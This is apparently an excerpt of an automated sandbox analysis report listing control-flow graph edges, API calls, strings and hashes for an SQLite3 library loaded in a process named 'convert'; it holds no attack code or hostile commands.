24626->24468 24629 61e0fbee 24627->24629 24628 61e0fc2e sqlite3_overload_function 24628->24473 24628->24474 24629->24627 24629->24628 24678 61e0fba7 sqlite3_free 24629->24678 24632 61e13565 
24631->24632 24633 61e135a4 sqlite3_free 24632->24633 24634 61e135b2 24632->24634 24636 61e135e4 24632->24636 24633->24634 24635 61e10775 6 API calls 24634->24635 24634->24636 24635->24636 24636->24498 24637->24454 24638->24454 24639->24462 24640->24487 24641->24531 24642->24506 24643->24503 24644->24514 24645->24523 24646->24538 24647->24508 24648->24495 24649->24540 24650->24519 24652 61e10791 24651->24652 24653 61e10865 24651->24653 24652->24653 24654 61e107ac sqlite3_mutex_enter 24652->24654 24653->24429 24657 61e107c2 24654->24657 24655 61e10819 24661 61e29053 malloc 24655->24661 24656 61e10854 sqlite3_mutex_leave 24656->24653 24657->24655 24664 61e09d6d sqlite3_mutex_leave sqlite3_mutex_enter 24657->24664 24659 61e1082e 24659->24656 24662 61e29079 sqlite3_log 24661->24662 24663 61e2906c 24661->24663 24662->24663 24663->24659 24664->24655 24665->24553 24666->24561 24667->24558 24669 61e0171c sqlite3_mutex_enter 24668->24669 24669->24602 24670->24619 24671->24600 24672->24576 24673->24588 24674->24589 24675->24594 24676->24616 24677->24578 24678->24629 24679 61e1882f 24680 61e18b79 24679->24680 24681 61e1883e 24679->24681 24681->24680 24682 61e18860 sqlite3_mutex_enter 24681->24682 24683 61e18882 24682->24683 24689 61e1889f 24682->24689 24685 61e1888b sqlite3_config 24683->24685 24683->24689 24684 61e1894c sqlite3_mutex_leave sqlite3_mutex_enter 24686 61e18b1a sqlite3_mutex_leave sqlite3_mutex_enter 24684->24686 24692 61e18977 24684->24692 24685->24689 24687 61e18b41 sqlite3_mutex_free 24686->24687 24688 61e18b58 sqlite3_mutex_leave 24686->24688 24687->24688 24688->24680 24689->24684 24690 61e18904 sqlite3_mutex_leave 24689->24690 24690->24680 24692->24686 24693 61e189e3 sqlite3_malloc 24692->24693 24695 61e18a10 sqlite3_config 24692->24695 24696 61e18a24 24692->24696 24694 61e18a3e sqlite3_free sqlite3_os_init 24693->24694 24697 61e18a02 24693->24697 24694->24697 24695->24696 24696->24693 24696->24697 24697->24686 24698 61e18c7e GetSystemInfo 
sqlite3_vfs_register sqlite3_vfs_register sqlite3_vfs_register sqlite3_vfs_register 24699 61e18cf9 24698->24699

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • sqlite3_initialize.SQLITE3 ref: 61E8F4FC
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18866
                                                                                                    • Part of subcall function 61E1882F: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E236D5), ref: 61E1889A
                                                                                                    • Part of subcall function 61E1882F: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B72
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E8F581
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E8F596
                                                                                                    • Part of subcall function 61E38CA4: memcmp.MSVCRT ref: 61E38CF2
                                                                                                    • Part of subcall function 61E38CA4: sqlite3_malloc64.SQLITE3 ref: 61E38D26
                                                                                                  • sqlite3_create_function.SQLITE3 ref: 61E8FF0F
                                                                                                  • sqlite3_create_function.SQLITE3 ref: 61E8FF59
                                                                                                  • sqlite3_create_function.SQLITE3 ref: 61E8FFA3
                                                                                                  • sqlite3_create_function.SQLITE3 ref: 61E90053
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E90197
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E8F7B9
                                                                                                    • Part of subcall function 61E09DA3: sqlite3_mutex_enter.SQLITE3 ref: 61E09DC2
                                                                                                  • sqlite3_errcode.SQLITE3 ref: 61E9019F
                                                                                                  • sqlite3_close.SQLITE3 ref: 61E901B0
                                                                                                  • sqlite3_free.SQLITE3 ref: 61E901CD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_create_function$sqlite3_freesqlite3_mutex_enter$sqlite3_mutex_leave$memcmpsqlite3_closesqlite3_configsqlite3_errcodesqlite3_initializesqlite3_malloc64
                                                                                                  • String ID: da$@da$BINARY$NOCASE$RTRIM$`a$`a$fts3$fts4$fts5$fts5vocab$porter$rtree$rtree_i32$simple$unicode61$Ca$sa$sa
                                                                                                  • API String ID: 1097977795-876794609
                                                                                                  • Opcode ID: 8e3bca910cd8baba17016b5a9c0f65a2fa3873b5f202d8509b758b91e6e7e757
                                                                                                  • Instruction ID: 8b8505f072dabdda41a0b713db29cfa77f56f0bb7a5865fea87b2e34fd5c2621
                                                                                                  • Opcode Fuzzy Hash: 8e3bca910cd8baba17016b5a9c0f65a2fa3873b5f202d8509b758b91e6e7e757
                                                                                                  • Instruction Fuzzy Hash: 71721BB0A083428FE740DF65C49535ABBF1BF85348F25CC2DE8998B395D779C8858B82

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetSystemInfo.KERNEL32(?,?,61EAA400,?,61E18A4B,?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18C98
                                                                                                  • sqlite3_vfs_register.SQLITE3 ref: 61E18CAE
                                                                                                    • Part of subcall function 61E18C1B: sqlite3_initialize.SQLITE3(?,?,61E18CB3), ref: 61E18C26
                                                                                                    • Part of subcall function 61E18C1B: sqlite3_mutex_enter.SQLITE3(?,?,61E18CB3), ref: 61E18C3E
                                                                                                    • Part of subcall function 61E18C1B: sqlite3_mutex_leave.SQLITE3(?), ref: 61E18C70
                                                                                                  • sqlite3_vfs_register.SQLITE3 ref: 61E18CC2
                                                                                                  • sqlite3_vfs_register.SQLITE3 ref: 61E18CD6
                                                                                                  • sqlite3_vfs_register.SQLITE3 ref: 61E18CEA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_vfs_register$InfoSystemsqlite3_initializesqlite3_mutex_entersqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 3532963230-0
                                                                                                  • Opcode ID: 0ba67b654b2df05829d946372c4bfe9abbccf5f817ae628fee8db0c2c44f91c6
                                                                                                  • Instruction ID: 39ad9906a7738034be70e133fd2074caaee3681ce6db2d97a12eaeaf59ae6a74
                                                                                                  • Opcode Fuzzy Hash: 0ba67b654b2df05829d946372c4bfe9abbccf5f817ae628fee8db0c2c44f91c6
                                                                                                  • Instruction Fuzzy Hash: 0EF030B0519700EBD704AF64C18771EBAE4AFC2708F21C85DE0868B384C775C889AF53
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_enter$strcmp
                                                                                                  • String ID: -journal$@
                                                                                                  • API String ID: 42632313-41206085
                                                                                                  • Opcode ID: ec97abe5e540d0c4739d5f0df203dce5c318fc38bf1efc91040ff62e907a0ff3
                                                                                                  • Instruction ID: c974af6fa06680f4fc67a4d06c946c599437a1b1b1eb0588565ced504671687d
                                                                                                  • Opcode Fuzzy Hash: ec97abe5e540d0c4739d5f0df203dce5c318fc38bf1efc91040ff62e907a0ff3
                                                                                                  • Instruction Fuzzy Hash: AD82D674A04255CFEB20CF68C884B89BBF1BF49308F1985E9D8989B352D774D985CF91

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18866
                                                                                                  • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E236D5), ref: 61E1889A
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18958
                                                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18965
                                                                                                  • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E189F9
                                                                                                  • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E236D5), ref: 61E18A1F
                                                                                                  • sqlite3_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18A41
                                                                                                  • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18A46
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B22
                                                                                                  • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B2D
                                                                                                  • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B49
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B5E
                                                                                                  • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1F51B), ref: 61E18B72
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_config$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                                                                  • String ID: `ha$ha
                                                                                                  • API String ID: 1590227068-2026301772
                                                                                                  • Opcode ID: fe41be9d3b2edaf310056cf993b18eb52420d05c6ac81e00ba047a9a0176a1cb
                                                                                                  • Instruction ID: 48fb1250555eb20f7220d5fff1a1896c7f2fb2f7d909219ec43e1d5708f49501
                                                                                                  • Opcode Fuzzy Hash: fe41be9d3b2edaf310056cf993b18eb52420d05c6ac81e00ba047a9a0176a1cb
                                                                                                  • Instruction Fuzzy Hash: 478130B4E28B418FEB009FA4C455B5977F2BB86318F24882ED9458B384E779C4C9DF51

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  • sqlite_master, xrefs: 61E620AA
                                                                                                  • attached databases must use the same text encoding as main database, xrefs: 61E621E0
                                                                                                  • sqlite_temp_master, xrefs: 61E620B0
                                                                                                  • unsupported file format, xrefs: 61E6224A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: attached databases must use the same text encoding as main database$sqlite_master$sqlite_temp_master$unsupported file format
                                                                                                  • API String ID: 0-2834926380
                                                                                                  • Opcode ID: 668539f068e00c70f718d778b6c129490ab944d6bbc7fe14519c5d657d5be9d5
                                                                                                  • Instruction ID: 126efefc8666987d41b367ea10850b38c09f2cf6e78172d9af59718c67f95019
                                                                                                  • Opcode Fuzzy Hash: 668539f068e00c70f718d778b6c129490ab944d6bbc7fe14519c5d657d5be9d5
                                                                                                  • Instruction Fuzzy Hash: 61A11274A4838A8BDB10CFA8C480B8EBBF5BF98318F64C429D858AB355D735D845CB81

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcmp$sqlite3_mutex_try
                                                                                                  • String ID: 0
                                                                                                  • API String ID: 2794522359-4108050209
                                                                                                  • Opcode ID: bdeb2c0d8014c408e0c038056a7015ec69a304939350b241a289f488e8b399f3
                                                                                                  • Instruction ID: 7c32d0843cc6ff6cbb4be9885c4192522ca5d9639d1661390ab352a5c33697d1
                                                                                                  • Opcode Fuzzy Hash: bdeb2c0d8014c408e0c038056a7015ec69a304939350b241a289f488e8b399f3
                                                                                                  • Instruction Fuzzy Hash: 3C128870A042558FEB05CFA8D484B9EBBF0AF99308F24C4ADD855EB396D778D881CB51

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 61E03B6D: sqlite3_stricmp.SQLITE3 ref: 61E03B9A
                                                                                                    • Part of subcall function 61E03B6D: sqlite3_stricmp.SQLITE3 ref: 61E03BB2
                                                                                                  • sqlite3_strnicmp.SQLITE3 ref: 61E62975
                                                                                                    • Part of subcall function 61E03FF8: sqlite3_stricmp.SQLITE3 ref: 61E0402B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_stricmp$sqlite3_strnicmp
                                                                                                  • String ID: no such table$no such view
                                                                                                  • API String ID: 2198927396-301769730
                                                                                                  • Opcode ID: c62eb199e9588d5d6e5eddf59372ac794658e18c10018c6c868a3206a4c15514
                                                                                                  • Instruction ID: 96c13b159e51404229eccb5a43295675180517db91716090a008738a6ce2f674
                                                                                                  • Opcode Fuzzy Hash: c62eb199e9588d5d6e5eddf59372ac794658e18c10018c6c868a3206a4c15514
                                                                                                  • Instruction Fuzzy Hash: AA61E470A043469FDB00CFB9C880A5EBBF5AF98248F24C82DE855DB355D774E8818B81

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  • Associated: 0000000B.00000002.649397390.0000000061E00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649417599.0000000061E96000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649422165.0000000061E98000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649430077.0000000061EAA000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649434745.0000000061EAB000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649439374.0000000061EAE000.00000004.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649444348.0000000061EB1000.00000008.00000001.01000000.00000007.sdmp
                                                                                                  • Associated: 0000000B.00000002.649448904.0000000061EB2000.00000002.00000001.01000000.00000007.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileRead
                                                                                                  • String ID: winRead
                                                                                                  • API String ID: 2738559852-2759563040
                                                                                                  • Opcode ID: c4337cb0fd85850df469cf7f31fe0deb70697ba84c08d7b32f8bb4299fa788be
                                                                                                  • Instruction ID: dbb1822c21219dbedb142de40895b69f70508cfcab968c75da9fb2436267f57b
                                                                                                  • Opcode Fuzzy Hash: c4337cb0fd85850df469cf7f31fe0deb70697ba84c08d7b32f8bb4299fa788be
                                                                                                  • Instruction Fuzzy Hash: 1941F071A052599BDF04CFA8D8A098EBBF2FF88314F25C529F968A7304D730E941DB91

                                                                                                  APIs
                                                                                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E107B4
                                                                                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E1085C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                  • String ID:
                                                                                                  • API String ID: 1477753154-0
                                                                                                  • Opcode ID: 54c4f853e93985096033869ff372d1fc870533058da7617f5f2967a284d588cc
                                                                                                  • Instruction ID: b356a87c22c2ca4caf9f79a52b35de56e5ce04f269780aeea373e7d77147a2ac
                                                                                                  • Opcode Fuzzy Hash: 54c4f853e93985096033869ff372d1fc870533058da7617f5f2967a284d588cc
                                                                                                  • Instruction Fuzzy Hash: E521A331E58B41CBDB009FB8C88535DBAE1BB86318F258529D854D7394D7B8C8D5CB81

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: mallocsqlite3_log
                                                                                                  • String ID:
                                                                                                  • API String ID: 2785431543-0
                                                                                                  • Opcode ID: 2497b9eac1ed071629c9c860313966b520965d8eb31863f906c97374ca8e31d7
                                                                                                  • Instruction ID: 0670e2dbad01d94845d600d9f87d4dcf0925d8d06e91d12d53a56787fb03e60a
                                                                                                  • Opcode Fuzzy Hash: 2497b9eac1ed071629c9c860313966b520965d8eb31863f906c97374ca8e31d7
                                                                                                  • Instruction Fuzzy Hash: C6F039B0C0830EABDB009FA5C9C1949BFE8AF44358F14C86DD9884F311E239E580CB51

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 2313487548-0
                                                                                                  • Opcode ID: 5d500ef5f87f43bad8fe0ab39683864ceec280efcc78f536c1c9c76f3707bdbd
                                                                                                  • Instruction ID: a2c751746a67533484b96b99feea120ac339a23e65d27da0d6d512f786f1c3f9
                                                                                                  • Opcode Fuzzy Hash: 5d500ef5f87f43bad8fe0ab39683864ceec280efcc78f536c1c9c76f3707bdbd
                                                                                                  • Instruction Fuzzy Hash: 4641B1729092108BDF05CF69C4813D97BE1BF48768F29867DCC58AF349D775C8408BA0
                                                                                                  APIs
                                                                                                  • sqlite3_value_int.SQLITE3 ref: 61E25F52
                                                                                                  • sqlite3_value_bytes.SQLITE3 ref: 61E25F72
                                                                                                  • sqlite3_value_blob.SQLITE3 ref: 61E25F7F
                                                                                                  • sqlite3_value_text.SQLITE3 ref: 61E25F96
                                                                                                  • sqlite3_value_int.SQLITE3 ref: 61E25FE6
                                                                                                  • sqlite3_result_text64.SQLITE3 ref: 61E26136
                                                                                                  • sqlite3_result_blob64.SQLITE3 ref: 61E26190
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_value_int$sqlite3_result_blob64sqlite3_result_text64sqlite3_value_blobsqlite3_value_bytessqlite3_value_text
                                                                                                  • String ID:
                                                                                                  • API String ID: 3992148849-0
                                                                                                  • Opcode ID: c2d0ee053c48204eb988723a62b28b779409c51639ca3f5a68df5f0e9df748a9
                                                                                                  • Instruction ID: 851ee7b833ecd36eb5d1f80d2d04e5b9eeecf1083cfa376fef74001c6b3005d4
                                                                                                  • Opcode Fuzzy Hash: c2d0ee053c48204eb988723a62b28b779409c51639ca3f5a68df5f0e9df748a9
                                                                                                  • Instruction Fuzzy Hash: EB915E75E042998FDB11CFA8C8A0A9DBBF1BB8D324F38C329D86497395D734D8429B41
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: sqlite3_malloc$memcmpsqlite3_freesqlite3_realloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1984881590-0
                                                                                                  • Opcode ID: 91e8b4dbfb976edfc2408a8010b1f075eb84adde925aa96fbe78564c8d1f7a2d
                                                                                                  • Instruction ID: bae385f28bfb006c8c72587603dfb1125932ea9dcd68260ed360e1294c815244
                                                                                                  • Opcode Fuzzy Hash: 91e8b4dbfb976edfc2408a8010b1f075eb84adde925aa96fbe78564c8d1f7a2d
                                                                                                  • Instruction Fuzzy Hash: F6E11675A082498FDB04CFA8C491A9ABBF2FF49314F298569DC15EB309D734E952CB90
                                                                                                  APIs
                                                                                                  • GetSystemTimeAsFileTime.KERNEL32 ref: 61E90589
                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E9059A
                                                                                                  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E905A2
                                                                                                  • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E905AA
                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E905B9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000000B.00000002.649402082.0000000061E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 61E00000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_11_2_61e00000_convert.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                  • String ID:
                                                                                                  • API String ID: 1445889803-0
                                                                                                  • Opcode ID: f8aed0544226ad359407b3c77e520ce91c63fa203a3cf3671ee0452ed86cd891
                                                                                                  • Instruction ID: 54b25a955e34b14385b40232b1bf302b809c1dedefd5e4d3fb8d28060c04b12b
